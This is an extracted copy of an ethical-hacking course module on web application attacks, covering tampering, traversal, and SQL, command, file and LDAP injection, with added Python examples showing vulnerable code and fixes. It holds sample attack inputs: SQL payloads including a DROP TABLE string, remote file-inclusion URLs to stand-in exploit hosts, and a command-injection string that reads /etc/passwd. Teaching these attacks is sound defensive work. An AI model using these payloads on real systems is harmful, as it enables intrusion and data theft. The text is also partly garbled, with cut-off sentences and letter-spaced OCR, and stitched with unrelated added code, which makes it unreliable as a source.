CEHv8 Module 13 Hacking Web Applications PDF
Module 13: Hacking Web Applications
Ethical Hacking and Countermeasures v8, Exam 312-50 Certified Ethical Hacker
Engineered by Hackers. Presented by Professionals.

Security News
XSS Attacks Lead Pack As Most Frequent Attack Type

and September, and offers an impression of the current internet security climate as a whole.

'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF).

One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 2012 was a considerable rise in the number of cross-site attacks; in particular, XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose 69%, from 603,016 separate attacks in Q2 to 1,018,817 in Q3. CSRF attacks reached second place on the Superfecta at 843,517.

Cross-site attacks are dependent upon the trust developed between site and user. XSS attacks involve a web application gathering malicious data from a user via a trusted site (often coming in the form of a hyperlink containing malicious content), whereas CSRF attacks exploit the trust that a site has for a particular user instead. These malicious security exploits can also be used to steal sensitive information such as usernames, passwords and credit card details - without the site or user's knowledge.

The Superfecta attack traffic for Q3 2012 can be broken down as follows:

As with Q2 2012, the majority of attacks FireHost blocked during the third calendar quarter of 2012 originated in the United States (11 million / 74%). There has, however, been a great shift in the number of attacks originating from Europe this quarter, as 17% of all malicious attack traffic seen by FireHost came from this region. Europe overtook Southern Asia (which was responsible for 6%) to become the second most likely origin of malicious traffic.

Ecommerce businesses need to be aware of the risks that this period may present to their security, as Todd Gleason, Director of Technology at FireHost, explains: "You'd better believe that hackers will try and take advantage of any surges in holiday shopping. They will be devising a number of ways they can take advantage of any web application vulnerabilities and will use an assortment of different attack types and techniques to do so. When it's a matter of confidential data at risk, including customer's financial information - credit card and debit card

steps to stop such attacks."
Module Objectives

The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help network administrators to monitor and manage the web application are described. Finally, web application pen testing is discussed.
This module familiarizes you with:
- How Web Applications Work
- Web Attack Vectors
- Web App Hacking Methodology
- Hacking Webservers
- Attack Authentication Mechanisms
- Attack Authorization Schemes
- Session Management Attack
- Attack Data Connectivity
- Attack Web Services
- Countermeasures
- Web Application Firewall
- Web Application Pen Testing
Module Flow
- Web App Concepts
- Web App Threats
- Hacking Methodology
- Web Application Hacking Tools
- Countermeasures
- Security Tools
- Web App Pen Testing

Let us begin with the Web App concepts.

This section introduces you to the web application and its components, explains how the web application works, and describes its architecture. It provides insight into Web 2.0 applications, vulnerability stacks, and web attack vectors.
Web Application Security Statistics
Source: https://www.whitehatsec.com

According to the WhiteHat Security website statistics report for 2012, cross-site scripting vulnerabilities are found on more web applications than any other class of vulnerability. From the graph you can observe that in the year 2012, cross-site scripting vulnerabilities were the most common, found in 55% of the web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.
[Chart: percentage of web applications affected, by vulnerability class: Cross-Site Scripting, Information Leakage, Insufficient Authorization, Cross-Site Request Forgery, Brute Force (16%), SQL Injection]
Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser.

Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.

Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency.

New web technologies such as Web 2.0 provide more attack surface for web application exploitation.
Web Application Components

Login: Most websites allow authentic users to access the application by means of a login. It means that to access the service or content offered by the web application, the user needs to submit his/her username and password. Example: gmail.com

Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information.

Data Access: Usually the web pages communicate with each other via a data access library in which all the database details are stored.
How Web Applications Work

[Figure 13.2: Working of Web Application. The figure shows the query SELECT * from news where id = 6329 run against a news table (columns ID, Topic, News; row 6329, Tech, CNN) and the resulting output.]
Web Application Architecture

[Figure 13.3: Web Application Architecture. Clients reach the application over the Internet through a firewall and a proxy server/cache. The web server hosts the presentation layer (HTTP request parser, servlet container, resource handler, cache, authentication and login). The application server hosts the business layer (web services, legacy application, data access), backed by a database server and cloud services.]
Web 2.0 Applications

Web 2.0 refers to a new generation of Web applications that provide an infrastructure for more dynamic user participation, social interaction and collaboration.

Web 2.0 Applications:
- RSS-generated syndication
- Blogs (Wordpress)
Vulnerability Stack

[Figure 13.4: Vulnerability Stack. From top to bottom: Custom Web Applications (business logic flaws, technical vulnerabilities); Third Party Components (open source / commercial); Database (Oracle / MySQL / MS SQL); Web Server (Apache / Microsoft IIS); Operating System (Windows / Linux / OS X); Network (router / switch); Security (IPS / IDS).]
Web Attack Vectors

- An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome.
- Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting.
- Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack.

Web Attack Vectors

- XML poisoning: Attackers provide manipulated XML documents that, when executed, can disturb the logic of the parsing method on the server. When huge XMLs are executed at the application layer, they can easily be compromised by the attacker to launch his or her attack and gather information.
- Client validation: Most client-side validation has to be supported by server-side authentication. The AJAX routines can be easily manipulated, which in turn makes a way for attackers to perform SQL injection, LDAP injection, etc. and compromise the web application's key resources.
- Web service routing issues: SOAP messages are permitted to access different nodes on the Internet by the WS-Routers. Exploited intermediate nodes can give access to the SOAP messages that are communicated between two endpoints.
Module Flow: Web App Threats

This section lists and explains the various web application threats such as parameter/form tampering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks, improper error handling, etc.
Web Application Threats - 1

Web application threats are not limited to attacks based on URL and port 80. Whatever ports, protocols, and OSI layers are used, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack.

Cookie Poisoning
Directory Traversal
Unvalidated Input

Cross-site Scripting (XSS)
An attacker bypasses the client's ID security mechanism and gains access privileges, and then injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.

Injection Flaws
SQL Injection

Parameter/Form Tampering
This type of tampering attack is intended to manipulate the parameters exchanged between client and server in order to modify application data, such as user credentials and permissions, price and quantity of products, etc. This information is actually stored in cookies, hidden form fields, or URL query strings, and is used to increase application functionality and control. Man in the middle is one example of this type of attack. Attackers use tools like WebScarab and Paros proxy for these attacks.

Denial-of-Service (DoS)
A denial-of-service attack is an attacking method intended to terminate the operations of a website or a server and make it unavailable to intended users. For instance, a website related to a bank or email service is not able to function for a few hours to a few days. This results in loss of time and money.

Broken Access Control
Broken access control is a method used by attackers where a particular flaw has been identified related to the access control, where authentication is bypassed and the attacker compromises the network.

Cross-site Request Forgery
Information Leakage
Improper Error Handling

Log Tampering
Logs are maintained by web applications to track usage patterns such as user login credentials, admin login credentials, etc. Attackers usually inject, delete, or tamper with web application logs so that they can perform malicious actions or hide their identities.

Buffer Overflow
A web application's buffer overflow vulnerability occurs when it fails to guard its buffer properly and allows writing beyond its maximum size.

Broken Session Management
When security-sensitive credentials such as passwords and other useful material are not properly taken care of, these types of attacks occur. Attackers compromise the credentials through these security vulnerabilities.

Security Misconfiguration
Broken Account Management

Insecure Storage
Web applications need to store sensitive information such as passwords, credit card numbers, account records, or other authentication information somewhere, possibly in a database or on a file system. If proper security is not maintained for these storage locations, then the web application may be at risk as attackers can access the storage and misuse the information stored. Insecure storage of keys, certificates, and passwords allows the attacker to gain access to the web application as a legitimate user.
Web Application Threats - 2

Platform Exploits
Various web applications are built by using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.

Insecure Direct Object References
When various internal implementation objects such as a file, directory, database record, or key are exposed through a reference by a developer, an insecure direct object reference takes place.

Insecure Cryptographic Storage
Authentication Hijacking

Network Access Attacks
Network access attacks can majorly impact web applications. These can have an effect on the basic level of services within an application and can allow access that standard HTTP application methods would not have access to.

Cookie Snooping
Web Services Attacks
Insufficient Transport Layer Protection

Hidden Manipulation
These types of attacks are mostly used by attackers to compromise e-commerce websites. Attackers manipulate the hidden fields and change the data stored in them. Several online stores face this type of problem every day. Attackers can alter prices and conclude transactions with the prices of their choice.

DMZ Protocol Attacks
- Defacement of websites

Unvalidated Redirects and Forwards
Attackers make a victim click an unvalidated link that appears to be a valid site. Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass leading to:
- Security management exploits

Failure to Restrict URL Access
Obfuscation Application
Security Management Exploits

Session Fixation Attack
In a session fixation attack, the attacker tricks or attracts the user to access a legitimate web server using an explicit session ID value.

Malicious File Execution
Malicious file execution vulnerabilities have been found on most applications. This vulnerability is caused by unchecked input into the web server. Due to this unchecked input, the files of attackers are easily executed and processed on the web server. In addition, the attacker performs remote code execution, installs the rootkit remotely, and in at least some cases, takes complete control over the systems.
Unvalidated Input

Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers.

An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning.

[Figure 13.5: Unvalidated Input. The browser posts the request http://juggyboy.com/login.aspx?user=jason&pass=springfield to the web application. The browser input is not validated by the web application, which builds the database query by concatenation: string sql = "select * from Users where user='" + User.Text + "' and pwd='" + Password.Text + "'"; the resulting modified query is sent to the database.]
Parameter/Form Tampering

[Figure: Tampering with the URL parameters. A request to http://www.juggybank.com/cust.asp?profile=21&debit=2500 is altered to http://www.juggybank.com/cust.asp?profile=82&debit=1500. Other parameters can be changed, including attribute parameters: http://www.juggybank.com/stat.asp?pg=531&status=view becomes http://www.juggybank.com/stat.asp?pg=147&status=delete.]

Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters.

Combo boxes, check boxes, and radio buttons are examples of pre-selected parameters used to transfer information between different pages, while allowing the user to select one of several predefined values. In a parameter tampering attack, an attacker may manipulate these values. For example, consider a form that includes the combo box as follows:

    <FORM METHOD=POST ACTION="xferMoney.asp">
    Source Account: <SELECT NAME="SrcAcc">
    <OPTION VALUE="123456789">******789</OPTION>
    <OPTION VALUE="868686868">******868</OPTION></SELECT>
    <BR>Amount: <INPUT NAME="Amount" SIZE=20>
    <BR>Destination Account: <INPUT NAME="DestAcc" SIZE=40>
    <BR><INPUT TYPE=SUBMIT> <INPUT TYPE=RESET>
    </FORM>

Bypassing
Parameter/form tampering can lead to theft of services, escalation of access, session hijacking, and assuming the identity of other users, as well as parameters allowing access to developer and debugging information.
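The countermeasure for the xferMoney.asp form above is to treat every submitted field, including the pre-selected SrcAcc value, as attacker-controlled and re-check it against the authenticated session on the server. The following is an added example (not part of the module): the field names SrcAcc, Amount and DestAcc come from the form, while the account ownership table and balances are constructed sample data.

```python
"""Server-side re-validation of the xferMoney.asp transfer form.

Added example, not the module's code. The browser only offered two <OPTION>
values for SrcAcc, but the server must still confirm that the submitted value
belongs to the logged-in user, and must re-check Amount and DestAcc as well.
"""
from decimal import Decimal, InvalidOperation

# Constructed sample data: which accounts each authenticated user owns.
# In a real application this comes from the server-side session and database.
ACCOUNT_OWNERS = {
    "jason": {"123456789", "868686868"},
    "mallory": {"555000111"},
}
BALANCES = {
    "123456789": Decimal("1000.00"),
    "868686868": Decimal("250.00"),
    "555000111": Decimal("50.00"),
}


class TransferError(ValueError):
    """Raised when a submitted form field fails server-side validation."""


def validate_transfer(session_user: str, form: dict) -> dict:
    """Re-validate every client-controlled field of the transfer form.

    Returns {"src", "dest", "amount"} or raises TransferError. The key point
    is the ownership check on SrcAcc: a <SELECT> on the client constrains
    nothing, because the POST body can carry any value.
    """
    src = form.get("SrcAcc", "")
    dest = form.get("DestAcc", "")
    raw_amount = form.get("Amount", "")

    # Authorization: the source account must be one the session user owns.
    if src not in ACCOUNT_OWNERS.get(session_user, set()):
        raise TransferError("source account not owned by session user")

    # Syntactic checks on the free-text destination (9 digits, not self).
    if not (dest.isdigit() and len(dest) == 9):
        raise TransferError("destination account must be 9 digits")
    if dest == src:
        raise TransferError("destination must differ from source")

    # Amount: exact decimal, positive, finite, at most two decimal places.
    # A negative amount would silently turn a debit into a credit.
    try:
        amount = Decimal(raw_amount)
        if not amount.is_finite() or amount <= 0:
            raise TransferError("amount must be a positive finite number")
        if amount != amount.quantize(Decimal("0.01")):
            raise TransferError("amount may have at most two decimal places")
    except InvalidOperation:
        raise TransferError("amount is not a valid money value") from None

    if amount > BALANCES.get(src, Decimal("0")):
        raise TransferError("insufficient funds")
    return {"src": src, "dest": dest, "amount": amount}


def transfer(session_user: str, form: dict) -> bool:
    """Apply a validated transfer; return False if validation rejected it."""
    try:
        t = validate_transfer(session_user, form)
    except TransferError:
        return False
    BALANCES[t["src"]] -= t["amount"]
    BALANCES[t["dest"]] = BALANCES.get(t["dest"], Decimal("0")) + t["amount"]
    return True


if __name__ == "__main__":
    # Legitimate submission from the form as rendered for "jason".
    print(transfer("jason", {"SrcAcc": "123456789", "DestAcc": "555000111", "Amount": "25.00"}))
    # Tampered SrcAcc: mallory edits the <OPTION> value to jason's account.
    print(transfer("mallory", {"SrcAcc": "123456789", "DestAcc": "555000111", "Amount": "25.00"}))
```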
Directory Traversal

Let us consider another example where an attacker tries to access files located outside the web publishing directory using directory traversal:

[Figure 13.7: Directory Traversal]
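The server-side check that defeats the traversal shown in Figure 13.7 is to normalise the requested path and refuse anything that would leave the publishing directory. Below is an added example (not from the module); the web root /var/www/html is an assumption, and it also covers URL-encoded, double-encoded and backslash variants of the same idea.

```python
"""Rejecting directory traversal under a web publishing directory.

Added example, not the module's code. The request path is decoded, split into
components and normalised without touching the filesystem; anything that would
climb above the assumed web root is rejected rather than silently clamped.
"""
from pathlib import PurePosixPath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = PurePosixPath("/var/www/html")  # assumed web root for this example


def resolve_under_root(requested: str,
                       root: PurePosixPath = WEB_ROOT) -> Optional[PurePosixPath]:
    """Return the absolute path for `requested`, or None if it escapes `root`.

    Handles plain '../', URL-encoded (%2e%2e%2f) and double-encoded
    (%252e%252e%252f) sequences, backslash separators and embedded NUL bytes.
    A real server would additionally resolve symlinks (os.path.realpath) on
    the returned path and re-check containment.
    """
    # Decode twice so a double-encoded payload cannot slip past one decode.
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        return None  # NUL truncation trick, e.g. "page.html%00.jpg"
    # Treat backslashes as separators, as IIS-style paths do.
    decoded = decoded.replace("\\", "/")
    # Drop empty and '.' components; a leading '/' therefore cannot
    # replace the root with an absolute path.
    parts = [p for p in decoded.split("/") if p not in ("", ".")]

    stack = []
    for part in parts:
        if part == "..":
            if not stack:
                return None  # would climb above the web root: traversal
            stack.pop()
        else:
            stack.append(part)
    return root.joinpath(*stack)


def serve_allowed(requested: str) -> bool:
    """True when the request stays inside WEB_ROOT."""
    return resolve_under_root(requested) is not None
```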
Security Misconfiguration

Easy Exploitation: Using misconfiguration vulnerabilities, attackers gain unauthorized access to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories, etc.

Common Prevalence: Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code.

Example:
- The application server admin console is automatically installed and not removed
- Default accounts are not changed
- Attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over

Developers and network administrators should check that the entire stack is configured properly, because security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. For instance, if the server is not configured properly, then it results in various problems that can affect the security of a website. The problems that lead to such instances include server software flaws, unpatched security flaws, enabling unnecessary services, and improper authentication. A few of these problems can be detected easily with the help of automated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features have to be taken care of, and it proves very beneficial if they are completely disabled so that outsiders don't make use of them for malicious attacks. All the application-based files have to be taken care of through proper authentication and strong security methods, or crucial information can be leaked to the attackers.
Injection Flaws

- Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query.
- Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access.
- Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be easily discovered by application vulnerability scanners and fuzzers.

Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Injection Flaws
- SQL injection
- Command injection
- LDAP injection
S Q L I n j e c t i o n A t t a c k s C E H
J SQL in je c tio n atta cks use a s e rie s o f m a lic io u s SQL q u e rie s to d ire c tly
m a n ip u la te th e d ata ba se
SQL injection
J An a tta cke r can use a v u ln e ra b le w e b a p p lic a tio n to bypass n o rm a l s e c u rity
attacks
m e asu re s and o b ta in d ire c t access to th e v a lu a b le data
J SQL in je c tio n atta cks can o fte n be executed fr o m th e a dd re ss b ar, fro m
w ith in a p p lic a tio n fie ld s , and th ro u g h queries and searches
01 <?php
02 fu n c tio n save e m a il( $ u s e r , $m essage)
W eb ....................... ■נ In te r n e t 03 {
B ro w s e r 04 $sql = "IN S E R T IN T O M e s s a g e s (
05 u s e r, m essage
06 ) V A LU E S (
07 ' $ u s e r1, ' $m essage'
t e s t ') ; D R O P T A B LE M e s s a g e s ; - -
08 )
09 re tu rn m y s q l_ q u e r y ( $ s q l) ;
W hen th is code is sent to th e d atabase
10 }
server, it d ro p s th e Messages ta b le
11 ?>
A tta c k e r t e s t ') , ( 'u s e r 2 ', '1 am J a s o n ' ) , ( ' u s e r3 ', 'Y o u a re hacked
Note: For complete coverage of SQL injection concepts and techniques, refer to Module 14: SQL Injection

SQL Injection Attacks
SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. Using SQL injection methods, an attacker can use a vulnerable web application to avoid normal security measures and obtain direct access to valuable data.

The reason SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement,
    SELECT * FROM tablename WHERE UserID = 2302
becomes the following with a simple SQL injection attack (the attacker appends " OR 1=1" to the UserID parameter):
    SELECT * FROM tablename WHERE UserID = 2302 OR 1=1
The expression "OR 1=1" evaluates to TRUE for every row, so the WHERE clause no longer filters anything and the query returns every user record, allowing the enumeration of all user ID values from the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to:
- Perform queries against data in the database, often even data to which the application would not normally have access
FIGURE 13.8: SQL Injection Attacks (SQL-injection-vulnerable server code, and code to insert spammy data on behalf of other users)
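The save_email() pattern from Figure 13.8 and the "OR 1=1" lookup from the text, reproduced as an added example in Python with sqlite3 (this is not code from the module; the table layout, the sample users and the helper names are constructed for illustration). It shows the multi-row VALUES payload inserting rows on behalf of other users, the OR 1=1 enumeration, and the parameterised versions that defeat both:

```python
"""Added example, not from the CEH module: the slide's save_email() pattern
and the 'OR 1=1' lookup in Python/sqlite3, each beside a parameterised fix.
Table layout, sample users and payloads are constructed for illustration."""
import sqlite3


def fresh_db() -> sqlite3.Connection:
    """In-memory database with the module's Messages table plus a small Users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Messages (user TEXT, message TEXT)")
    con.execute("CREATE TABLE Users (UserID INTEGER, name TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?)",
                    [(2302, "jason"), (2303, "addison"), (2304, "mark")])
    return con


def save_email_vulnerable(con: sqlite3.Connection, user: str, message: str) -> None:
    """Same shape as the PHP on the slide: the SQL text is built from raw input."""
    sql = f"INSERT INTO Messages (user, message) VALUES ('{user}', '{message}')"
    con.execute(sql)


def save_email_safe(con: sqlite3.Connection, user: str, message: str) -> None:
    """Parameterised INSERT: values travel separately from the SQL text, so a
    quote inside the message can never close the literal."""
    con.execute("INSERT INTO Messages (user, message) VALUES (?, ?)", (user, message))


def lookup_user_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    """WHERE clause concatenated from the request parameter, as in the text."""
    return con.execute(
        f"SELECT UserID, name FROM Users WHERE UserID = {user_id}").fetchall()


def lookup_user_safe(con: sqlite3.Connection, user_id: str) -> list:
    """int() rejects anything that is not a number; the query is parameterised."""
    return con.execute(
        "SELECT UserID, name FROM Users WHERE UserID = ?", (int(user_id),)).fetchall()


# Payload from Figure 13.8: closes the attacker's own row and appends rows
# attributed to other users. sqlite3's execute() refuses stacked statements,
# so the slide's "; DROP TABLE Messages; --" tail would fail here, but the
# multi-row VALUES trick needs only the single statement the driver allows.
SPAM_PAYLOAD = "test'), ('user2', 'I am Jason'), ('user3', 'You are hacked"


def demo_spam_insert_vulnerable() -> list:
    """Messages rows after the attacker submits SPAM_PAYLOAD through the vulnerable path."""
    con = fresh_db()
    save_email_vulnerable(con, "attacker", SPAM_PAYLOAD)
    return con.execute("SELECT user, message FROM Messages ORDER BY user").fetchall()


def demo_spam_insert_safe() -> list:
    """Same payload through the parameterised path: stored as one literal message."""
    con = fresh_db()
    save_email_safe(con, "attacker", SPAM_PAYLOAD)
    return con.execute("SELECT user, message FROM Messages").fetchall()


def demo_or_1_equals_1() -> tuple:
    """(rows leaked by the vulnerable lookup, whether the safe lookup rejected the input)."""
    con = fresh_db()
    leaked = lookup_user_vulnerable(con, "2302 OR 1=1")
    try:
        lookup_user_safe(con, "2302 OR 1=1")
        rejected = False
    except ValueError:
        rejected = True
    return len(leaked), rejected


if __name__ == "__main__":
    print(demo_spam_insert_vulnerable())
    print(demo_spam_insert_safe())
    print(demo_or_1_equals_1())
```

The parameterised calls are the fix the module's Module 14 elaborates on: the driver never lets data change the statement's structure, so neither the extra VALUES rows nor the trailing OR clause can form.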
Command Injection Attacks
- An attacker tries to craft an input string to gain shell access to a web server
- Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs
- In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML code or scripting
- File injection example: http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?
Command Injection Attacks

Shell Injection
To complete various functionalities, web applications invoke other programs, for example sending an email through the UNIX sendmail program. If user input reaches the command line of such a program unchecked, an attacker can inject additional commands into it. This kind of attack is dangerous because the injected commands run with the privileges of the web server process. Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs.
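An added example (not code from the module) of the shell-injection pattern behind system() and Runtime.exec(), written in Python with subprocess. The "ping" wrapper and the hostnames are hypothetical, and echo stands in for the real tool so that the example runs offline and harmlessly; the point is the difference between one string handed to a shell and an argv list handed to the kernel:

```python
"""Added example, not from the CEH module: shell injection through a command
built by string concatenation (the same flaw as system()/Runtime.exec() with
untrusted input), next to the argv-list form. The "ping" wrapper is
hypothetical; 'echo' stands in for the real tool so this runs offline."""
import re
import shlex
import subprocess

# Hostnames are letters, digits, dots and hyphens: nothing a shell cares about.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def build_shell_command(host: str) -> str:
    """The vulnerable pattern: one string destined for /bin/sh -c."""
    return "echo pinging " + host


def commands_the_shell_would_run(cmdline: str) -> list:
    """Tokenise a command line the way a POSIX shell would and split it into the
    separate commands the shell would execute. Used to show what the attacker's
    ';' does without actually running anything."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def run_argv(host: str) -> str:
    """No shell at all: the host is a single argv element however it is spelled,
    so a ';' in it is just a character in the argument."""
    out = subprocess.run(["echo", "pinging", host],
                         capture_output=True, text=True, check=True)
    return out.stdout.rstrip("\n")


def run_validated(host: str) -> str:
    """Allow-list the input as well: defence in depth for tools that interpret
    their own arguments (for example a leading '-' option)."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return run_argv(host)


if __name__ == "__main__":
    evil = "www.juggyboy.com; cat /etc/passwd"
    print(commands_the_shell_would_run(build_shell_command(evil)))
    print(run_argv(evil))
    try:
        run_validated(evil)
    except ValueError as err:
        print(err)
```

Run with the injected hostname, commands_the_shell_would_run() shows the two commands a shell would execute, run_argv() shows the same string arriving as one harmless argument, and run_validated() refuses it outright.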
HTML Embedding
This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application. In HTML embedding attacks, user input to a web script is placed into the output HTML without being checked for HTML code or scripting.

File Injection
The attacker exploits this vulnerability and injects malicious code into system files. Users are allowed to upload various files to the server through various applications, and those files can be accessed over the Internet from anywhere in the world. If an uploaded file ends with a .php extension and any user requests it, the server interprets it as a PHP script and executes it. This allows an attacker to execute arbitrary commands.
Command Injection Example
The banner-submission form on juggyboy.com (fields: User Name "Addison", Email Address "addi@juggyboy.com", Site URL "www.juggyboy.com", Banner URL) is handled by a CGI script that stores the submitted pipe-delimited record in the database with INSERT and UPDATE commands. The attacker enters the following malicious code in the Banner URL field:

    www.juggyboy.com/banner.gif|newpassword|1036|60|468

The extra fields (a new password and the account number 1036) are written to the database as if they were that account's own record, so the attacker has set a new password for account 1036. Poor input validation at the server script that uses database INSERT and UPDATE record commands was exploited in this attack.

FIGURE 13.9: Command Injection Example
File Injection Attack

Client code running in a browser:

    <form method="get">
      <select name="DRINK">
        <option value="pepsi">pepsi</option>
        <option value="coke">coke</option>
      </select>
      <input type="submit">
    </form>

Vulnerable PHP code:

    <?php
    $drink = 'coke';
    if (isset($_GET['DRINK']))
        $drink = $_GET['DRINK'];
    require($drink . '.php');
    ?>

Exploit code (the attacker's request):

    http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?

require() is handed the attacker's value, so (with allow_url_include enabled) PHP fetches and executes the remote script. The trailing "?" turns the ".php" that the code appends into a query string, so the remote URL still resolves.
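The require($drink . '.php') pattern from the slide, reproduced as an added Python example (not code from the module) beside a loader that allow-lists the name and confines the resolved path to the include directory. The "menu" directory, its files and the secret file outside it are constructed in a temporary directory so the example runs offline; it shows the local-file (path traversal) form of the attack, since the remote form in the exploit URL depends on PHP's URL-include behaviour:

```python
"""Added example, not from the CEH module: the slide's require($drink . '.php')
pattern as a Python file loader, beside a version that allow-lists the name and
confines the resolved path. The 'menu' directory, files and names are
constructed in a temporary directory so the example runs offline."""
import os
import tempfile

ALLOWED_DRINKS = {"coke", "pepsi"}


def include_vulnerable(base: str, drink: str) -> str:
    """Whatever the client sent becomes part of the path (the local-file form of
    the attack; the slide's remote form additionally relies on PHP's
    allow_url_include to fetch http://... inside require())."""
    with open(os.path.join(base, drink + ".txt")) as f:
        return f.read()


def include_safe(base: str, drink: str) -> str:
    """Two independent checks: the name must be on the allow list, and the
    resolved path must still lie inside the intended directory."""
    if drink not in ALLOWED_DRINKS:
        raise ValueError(f"unknown drink: {drink!r}")
    root = os.path.realpath(base)
    path = os.path.realpath(os.path.join(root, drink + ".txt"))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("path escapes the include directory")
    with open(path) as f:
        return f.read()


def demo() -> dict:
    """Builds menu/coke.txt, menu/pepsi.txt and a secret.txt one level up, then
    tries a normal name and a traversal name against both loaders."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        menu = os.path.join(tmp, "menu")
        os.mkdir(menu)
        for name in ALLOWED_DRINKS:
            with open(os.path.join(menu, name + ".txt"), "w") as f:
                f.write(f"order: {name}")
        with open(os.path.join(tmp, "secret.txt"), "w") as f:
            f.write("db_password=hunter2")  # constructed secret outside the menu dir

        results["normal"] = include_vulnerable(menu, "coke")
        results["traversal_vulnerable"] = include_vulnerable(menu, "../secret")
        results["safe_normal"] = include_safe(menu, "coke")
        try:
            include_safe(menu, "../secret")
            results["traversal_safe"] = "loaded"
        except ValueError:
            results["traversal_safe"] = "rejected"
    return results


if __name__ == "__main__":
    print(demo())
```

The allow list alone would already stop this request; the realpath containment check is kept as a second, independent control for loaders that must accept names not known in advance.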
What Is LDAP Injection?
An LDAP injection technique is used to take advantage of non-validated web application input vulnerabilities to pass LDAP filters used for searching Directory Services, in order to obtain direct access to databases behind an LDAP tree.

LDAP Directory Services store and organize information based on its attributes. The information is hierarchically organized as a tree of directory entries.

Filter syntax: (attributeName operator value)

    Operator   Example
    =          (objectclass=user)
    >=         (mdbStorageQuota>=100000)
    <=         (mdbStorageQuota<=100000)
    ~=         (displayName~=Foeckeler)
    *          (displayName=*John*)
    AND (&)    (&(objectclass=user)(displayName=John))
    OR (|)     (|(objectclass=user)(displayName=John))
    NOT (!)    (!(objectClass=group))

FIGURE 13.10: LDAP Injection
How LDAP Injection Works
LDAP injection attacks are similar to SQL injection attacks but exploit user parameters to generate the LDAP query.

LDAP injection attacks are commonly used against web applications. They apply to any application that has some kind of user input used to generate LDAP queries. To test whether an application is vulnerable to LDAP code injection, send the server a query that generates invalid input. If the LDAP server returns an error, it can be exploited with code injection techniques. Successful LDAP injection can lead to:
- Login bypass
- Information disclosure
- Privilege escalation

Normal operation: the client sends a normal query to the LDAP server and receives the normal result.
FIGURE 13.11: Normal operation

Operation with code injection: the client sends the normal query plus injected code to the LDAP server and receives the normal result and/or additional information.
FIGURE 13.12: Operation with code injection

Attack
